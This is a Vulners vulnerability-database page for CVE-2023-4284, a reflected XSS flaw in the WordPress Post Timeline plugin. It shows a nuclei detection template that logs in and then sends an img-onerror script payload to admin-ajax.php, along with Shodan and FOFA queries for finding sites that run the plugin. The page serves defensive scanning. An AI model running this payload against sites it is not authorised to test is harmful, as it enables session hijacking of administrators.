Lucene search
K

WordPress Post Timeline Plugin < 2.2.6 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

WordPress Post Timeline Plugin < 2.2.6 has a high severity cross-site scripting vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-4284
4 Sep 202316:16
circl
CNNVD
WordPress plugin Post Timeline Cross-Site Scripting Vulnerability
4 Sep 202300:00
cnnvd
CVE
CVE-2023-4284
4 Sep 202311:26
cve
Cvelist
CVE-2023-4284 Post Timeline < 2.2.6 - Reflected XSS
4 Sep 202311:26
cvelist
EUVD
EUVD-2023-54155
3 Oct 202520:07
euvd
NVD
CVE-2023-4284
4 Sep 202312:15
nvd
Patchstack
WordPress Post Timeline Plugin <= 2.2.5 is vulnerable to Cross Site Scripting (XSS)
11 Aug 202300:00
patchstack
Prion
Cross site scripting
4 Sep 202312:15
prion
Positive Technologies
PT-2023-28614 · WordPress · Post Timeline
4 Sep 202300:00
ptsecurity
RedhatCVE
CVE-2023-4284
9 Jan 202612:32
redhatcve
Rows per page
id: CVE-2023-4284

info:
  name: WordPress Post Timeline Plugin < 2.2.6 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The Post Timeline WordPress plugin before version 2.2.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape an invalid nonce before outputting it back in an AJAX response, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Authenticated attackers can inject malicious JavaScript through an invalid nonce parameter in AJAX responses to execute code in administrator browsers and potentially hijack WordPress sites.
  remediation: |
    Update Post Timeline plugin to version 2.2.6 or later that properly sanitizes and escapes the nonce parameter in AJAX responses.
  reference:
    - https://wpscan.com/vulnerability/1c126869-0afa-456f-94cc-10334964e5f9
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4284
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2023-4284
    cwe-id: CWE-79
    epss-score: 0.00709
    epss-percentile: 0.49017
    cpe: cpe:2.3:a:agilelogix:post_timeline:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: agilelogix
    product: post-timeline
    shodan-query: http.html:"wp-content/plugins/post-timeline/"
    fofa-query: body="wp-content/plugins/post-timeline/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,xss,post-timeline,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'post-timeline'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin-ajax.php?action=ptl_ajax_handler&asl-nounce=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(document.domain)'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022028f331faa2f32f342739b2abb5fc7a8fce8202493325142eb655bc83415fbfee022011c9d8a463736df2a17789a67ae923c589f53d8cfe040056b08d508edd1c013c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.16.1
EPSS0.00709
SSVC
12